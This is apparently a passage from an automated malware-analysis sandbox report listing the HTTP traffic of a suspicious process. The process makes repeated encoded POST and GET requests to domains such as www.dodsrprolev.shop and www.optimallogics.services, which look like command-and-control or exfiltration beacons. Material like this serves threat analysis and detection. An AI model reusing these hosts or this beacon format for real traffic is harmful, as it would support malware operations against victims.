                                                                                                                                  Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pF8gyx8BgWQvl6njJX8RtKkdzdNWi8UJOfjKSfQK3evL9M9XZyETjwUCNpeSOxxdeF3BTuNzo5fUWN7AoDJUnfay7yTRcRC4hAK0rKn2cc2jhq%2BgwIUWWgZvFftDAC2Goi4T7oE7Uw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8ded22b86aa40c17-DFW
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1261&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=606&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                  Data Raw: 32 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae [TRUNCATED]
                                                                                                                                  Data Ascii: 2d3To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2ID`
                                                                                                                                  Nov 7, 2024 12:55:40.571569920 CET341INData Raw: 8a b4 86 35 ca 5c 50 08 77 ba c8 22 28 90 08 8d 6f 2b 9e 4a 95 87 e0 07 0e f8 20 ef 8f 5b f9 f1 a4 da ec e9 57 70 bf 96 19 89 70 dc d1 fe 5a 6c 4f e0 17 b8 a4 90 af 48 47 bd c1 b4 da ad e5 01 43 ba 0a 61 ec ea dc 29 64 b2 fe 2f 1a 3b 46 1e 16 52
                                                                                                                                  Data Ascii: 5\Pw"(o+J [WppZlOHGCa)d/;FR}dVfd]"fm%1 vbv+Y~ %cx0J]L$v i4Lm7ph%o$,Ak[[


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  42192.168.2.450049188.114.97.3804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:55:42.384443998 CET626OUTPOST /42jb/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.dodsrprolev.shop
                                                                                                                                  Origin: http://www.dodsrprolev.shop
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.dodsrprolev.shop/42jb/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 38 4d 48 78 4d 6e 42 31 70 6b 6f 38 31 6d 30 49 71 6b 68 30 55 30 32 61 6b 70 4a 67 4d 4a 50 4f 38 70 67 52 67 35 54 7a 44 45 41 41 50 45 47 4e 69 33 45 4f 42 50 71 65 41 34 31 4a 4c 74 49 49 38 69 6f 55 6a 39 77 6e 77 4d 4f 74 71 45 48 58 2f 36 48 66 56 35 31 73 5a 33 30 5a 44 79 4c 72 43 39 76 63 47 61 4c 2b 35 6c 4a 57 4c 4e 62 36 68 57 51 54 52 30 65 62 48 61 32 61 37 79 5a 52 58 35 75 72 44 4d 6a 72 53 35 75 35 67 32 54 43 51 59 52 78 43 77 67 55 46 47 64 6d 6e 4e 48 6e 51 46 4f 6e 6b 72 45 79 6a 54 68 62 36 69 48 76 68 79 70 51 6d 4d 2f 61 71 59 4c 6c 35 51 43 76 42 42 41 64 33 64 4e 5a 67 61 47 42 4f 48 66 76 2f 7a 44 71 44 65 59 3d
                                                                                                                                  Data Ascii: NBfdCRyH=8MHxMnB1pko81m0Iqkh0U02akpJgMJPO8pgRg5TzDEAAPEGNi3EOBPqeA41JLtII8ioUj9wnwMOtqEHX/6HfV51sZ30ZDyLrC9vcGaL+5lJWLNb6hWQTR0ebHa2a7yZRX5urDMjrS5u5g2TCQYRxCwgUFGdmnNHnQFOnkrEyjThb6iHvhypQmM/aqYLl5QCvBBAd3dNZgaGBOHfv/zDqDeY=
                                                                                                                                  Nov 7, 2024 12:55:43.176357031 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:55:43 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zRFEoabB8Hv3riI7m0DsKcR5gvkEiEgVoAf%2FpMxfp1%2BP9pPaSOgu8SnIiR5Ikm0pat40sACAGJ6tUZffhpPaa9Jum4uuYXm1nTeASd6y%2FVlYHcRxZQ2DBG0juZl%2FnYoOVwy0SCzVbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8ded22c8b82447af-DFW
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1855&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=626&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                  Data Raw: 32 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae [TRUNCATED]
                                                                                                                                  Data Ascii: 2c8To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2
                                                                                                                                  Nov 7, 2024 12:55:43.176386118 CET352INData Raw: f4 49 ec 44 60 d4 8a b4 86 35 ca 5c 50 08 77 ba c8 22 28 90 08 8d 6f 2b 9e 4a 95 87 e0 07 0e f8 20 ef 8f 5b f9 f1 a4 da ec e9 57 70 bf 96 19 89 70 dc d1 fe 5a 6c 4f e0 17 b8 a4 90 af 48 47 bd c1 b4 da ad e5 01 43 ba 0a 61 ec ea dc 29 64 b2 fe 2f
                                                                                                                                  Data Ascii: ID`5\Pw"(o+J [WppZlOHGCa)d/;FR}dVfd]"fm%1 vbv+Y~ %cx0J]L$v i4Lm7ph%o$,Ak


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  43192.168.2.450050188.114.97.3804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:55:44.935820103 CET10708OUTPOST /42jb/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.dodsrprolev.shop
                                                                                                                                  Origin: http://www.dodsrprolev.shop
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.dodsrprolev.shop/42jb/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 38 4d 48 78 4d 6e 42 31 70 6b 6f 38 31 6d 30 49 71 6b 68 30 55 30 32 61 6b 70 4a 67 4d 4a 50 4f 38 70 67 52 67 35 54 7a 44 45 34 41 50 53 4b 4e 77 48 34 4f 41 50 71 65 4a 59 31 55 4c 74 4a 49 38 69 77 51 6a 36 34 64 77 4f 32 74 71 6b 62 58 33 70 66 66 4d 4a 31 73 57 58 30 61 4d 53 4c 45 43 39 2b 56 47 61 62 2b 35 6c 4a 57 4c 4b 6a 36 32 56 49 54 57 45 65 45 51 71 32 73 74 43 5a 74 58 35 47 37 44 4d 58 37 53 6f 4f 35 67 58 2f 43 44 61 4a 78 66 41 67 57 45 47 63 68 6e 4e 4b 2f 51 46 43 4e 6b 72 77 55 6a 55 52 62 34 32 69 6b 37 47 5a 51 6b 73 58 41 2b 59 62 6b 78 53 75 39 61 51 30 68 35 2f 59 4e 37 5a 69 49 44 6d 4f 36 6e 79 72 38 52 4f 6c 6f 4c 47 4a 72 64 69 43 7a 65 53 59 67 49 35 30 4b 6d 31 55 34 47 4a 6d 69 34 50 66 4f 73 6c 36 47 67 30 63 66 30 43 6b 2b 32 72 58 73 55 35 65 50 2b 4c 4b 2b 4a 51 2f 55 39 6d 34 63 63 70 59 79 2b 6a 59 5a 54 61 39 67 30 6c 66 51 32 39 46 68 37 35 68 44 52 35 55 2f 61 42 2f 50 39 52 4e 71 36 36 53 4e 58 46 2b 70 7a 78 70 44 75 68 36 68 72 [TRUNCATED]
                                                                                                                                  Data Ascii: NBfdCRyH=8MHxMnB1pko81m0Iqkh0U02akpJgMJPO8pgRg5TzDE4APSKNwH4OAPqeJY1ULtJI8iwQj64dwO2tqkbX3pffMJ1sWX0aMSLEC9+VGab+5lJWLKj62VITWEeEQq2stCZtX5G7DMX7SoO5gX/CDaJxfAgWEGchnNK/QFCNkrwUjURb42ik7GZQksXA+YbkxSu9aQ0h5/YN7ZiIDmO6nyr8ROloLGJrdiCzeSYgI50Km1U4GJmi4PfOsl6Gg0cf0Ck+2rXsU5eP+LK+JQ/U9m4ccpYy+jYZTa9g0lfQ29Fh75hDR5U/aB/P9RNq66SNXF+pzxpDuh6hrebxueKhpnXOQyNGp9QcxbT1MidGRJ6oqywDe+XY1VrsiiAEF4egC05bnVu1XOjPwBmlRD3nGk1uPaoSZ23CReul8pTttg09H6KvEZOfUlIClku5rZu0oVRJt6OvWQI05AFF/5CMiXPgvgOhF2eOG3GVufcTAacxJqoAo1+f5BT/1yyn6hqBXlvDmPxrE5I5dCy99pv1tz1vXRHtNibsDJvX39wTw+9bTg+Eb7pvg4zciH4yD1E9+ZgfQlA43zfWE2UFJ4m53dnkoUzZqVibiHTjM2Anv3N1wFApymdSrJ8EC0Bi+F6uyLOo+WXTlQCvxHgG0bk5ZTZ+ENwm2C+jiBWvktfPG32m+Z7L/4Dr6AdekhzPCi6RMSO9LzGUvOy2GWs/1t1dyYosy0A4SuEcJ6wQUNA01saneCjeVqfx0Stu166eKUXYoTjpuPGLNdH4/08U+5rA12TvPw7aT4amToVTY1GL/LgHyzRW1dJfXZ75in31QZy7MJT3Kb18Jn0L32/ycXzh41aAKrFWK50sUj1QsrLb3up2LgZkmlyV/JB7vIIASW0sbIlN204fHviDV3V6zJwd0gHtGDwLri+MYyig2ITFvxIOb0OmFrE3nTN/slMryRaAGY59gWY7U5rTdvv3guN/HAs03gqfrjvsg0YxK9ZpXjzuHOG [TRUNCATED]
                                                                                                                                  Nov 7, 2024 12:55:45.798366070 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:55:45 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ULdGMbCLzBB8DifIneHL5xWL6ghBSLJQnVmV%2FcPIF81TcLeayqHEbckrdbLEpsaeQvxZr3XPJrAqrEoF%2B363%2F7Hved3arWUZ2NVpo1YQOCrE%2FwB6I4FS8xMBem3L4e1Z%2BJx3xO76Jg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8ded22d90b228789-DFW
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1257&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10708&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                  Data Raw: 32 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae [TRUNCATED]
                                                                                                                                  Data Ascii: 2c8To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~r
                                                                                                                                  Nov 7, 2024 12:55:45.798382044 CET357INData Raw: 76 32 7f 9c 03 f4 49 ec 44 60 d4 8a b4 86 35 ca 5c 50 08 77 ba c8 22 28 90 08 8d 6f 2b 9e 4a 95 87 e0 07 0e f8 20 ef 8f 5b f9 f1 a4 da ec e9 57 70 bf 96 19 89 70 dc d1 fe 5a 6c 4f e0 17 b8 a4 90 af 48 47 bd c1 b4 da ad e5 01 43 ba 0a 61 ec ea dc
                                                                                                                                  Data Ascii: v2ID`5\Pw"(o+J [WppZlOHGCa)d/;FR}dVfd]"fm%1 vbv+Y~ %cx0J]L$v i4Lm7ph%o$,


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  44192.168.2.450051188.114.97.3804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:55:47.473350048 CET338OUTGET /42jb/?NBfdCRyH=xOvRPSdGlVcg4ggtvlNaQF7r/q5ZE7OS64NTuszpJDlgcn3f2GAJOICwQ4poJfJ85RMy/fsotNCJs0/3zrWyWPthfBhIBxngO9nzBLvphHFnKcLlmUkHPG0=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.dodsrprolev.shop
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:55:48.344841003 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:55:48 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u16ROvnUPrlzsorWDte7SiCsVBtaHpQDr%2FqD7s4Rm28Sb3Dw95aI%2FD2IbGTCBWV4UJffXhS9XYizULmnZDhcEWiIJUNmu19uRm7oaDRrPkJmW1a1NEZ0Z8%2F4c%2F8GV6feRrUu8iK5TA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8ded22e8e9d07d5d-DFW
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1581&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=338&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                  Data Raw: 35 38 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                                                                                                                  Data Ascii: 583<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font
                                                                                                                                  Nov 7, 2024 12:55:48.344862938 CET1006INData Raw: 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74
                                                                                                                                  Data Ascii: -size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin
                                                                                                                                  Nov 7, 2024 12:55:48.344907045 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  45192.168.2.4500523.33.130.190804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:55:53.481245041 CET624OUTPOST /l7yl/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.optimallogics.services
                                                                                                                                  Origin: http://www.optimallogics.services
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.optimallogics.services/l7yl/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 68 53 43 67 65 6a 32 4d 63 37 35 34 74 35 33 68 6c 55 68 73 58 56 42 7a 69 57 7a 31 32 36 4b 56 4d 56 62 6c 62 4e 4b 42 51 54 69 66 5a 76 6f 34 69 35 66 69 66 48 37 2f 51 33 36 58 7a 44 47 75 66 4c 34 68 73 74 5a 39 38 70 57 68 39 37 58 38 30 7a 54 33 4f 4f 63 6e 4e 6b 36 58 39 73 55 67 79 6c 68 4b 51 73 2b 68 36 64 76 77 56 75 73 31 5a 72 31 72 54 64 36 59 56 64 32 54 72 6f 33 67 4a 37 54 4a 51 6f 62 44 4b 75 4a 67 2b 6f 4a 51 35 70 31 47 69 7a 39 67 6e 79 63 49 42 35 66 6b 58 74 72 74 74 67 30 4e 6e 59 67 47 72 56 77 66 72 35 4a 30 4a 66 70 32 2f 4d 56 55 49 35 73 4d 6a 67 3d 3d
                                                                                                                                  Data Ascii: NBfdCRyH=hSCgej2Mc754t53hlUhsXVBziWz126KVMVblbNKBQTifZvo4i5fifH7/Q36XzDGufL4hstZ98pWh97X80zT3OOcnNk6X9sUgylhKQs+h6dvwVus1Zr1rTd6YVd2Tro3gJ7TJQobDKuJg+oJQ5p1Giz9gnycIB5fkXtrttg0NnYgGrVwfr5J0Jfp2/MVUI5sMjg==


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  46192.168.2.4500533.33.130.190804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:55:56.035095930 CET644OUTPOST /l7yl/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.optimallogics.services
                                                                                                                                  Origin: http://www.optimallogics.services
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.optimallogics.services/l7yl/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 68 53 43 67 65 6a 32 4d 63 37 35 34 2f 6f 48 68 70 54 39 73 52 31 42 79 74 32 7a 31 73 4b 4c 63 4d 56 58 6c 62 49 79 52 51 42 47 66 5a 4e 41 34 6a 34 66 69 65 48 37 2f 59 58 36 65 39 6a 47 66 66 4c 30 44 73 74 56 39 38 70 79 68 39 34 44 38 33 41 37 30 4f 65 63 6c 43 45 36 56 35 73 55 67 79 6c 68 4b 51 73 36 48 36 64 6e 77 56 62 38 31 61 4f 42 71 65 39 36 5a 42 4e 32 54 76 6f 33 6b 4a 37 54 72 51 73 61 6d 4b 72 4e 67 2b 74 74 51 35 64 68 46 34 6a 39 6d 71 53 64 67 42 72 7a 6f 52 4e 53 44 6b 52 49 53 34 36 56 68 75 54 39 46 36 49 6f 6a 62 66 4e 46 69 4c 63 67 46 36 52 46 34 6c 37 6a 68 52 46 62 36 45 32 48 7a 55 4c 4c 4d 65 31 6d 2f 58 41 3d
                                                                                                                                  Data Ascii: NBfdCRyH=hSCgej2Mc754/oHhpT9sR1Byt2z1sKLcMVXlbIyRQBGfZNA4j4fieH7/YX6e9jGffL0DstV98pyh94D83A70OeclCE6V5sUgylhKQs6H6dnwVb81aOBqe96ZBN2Tvo3kJ7TrQsamKrNg+ttQ5dhF4j9mqSdgBrzoRNSDkRIS46VhuT9F6IojbfNFiLcgF6RF4l7jhRFb6E2HzULLMe1m/XA=


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  47192.168.2.4500543.33.130.190804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:55:58.593780994 CET10726OUTPOST /l7yl/ HTTP/1.1
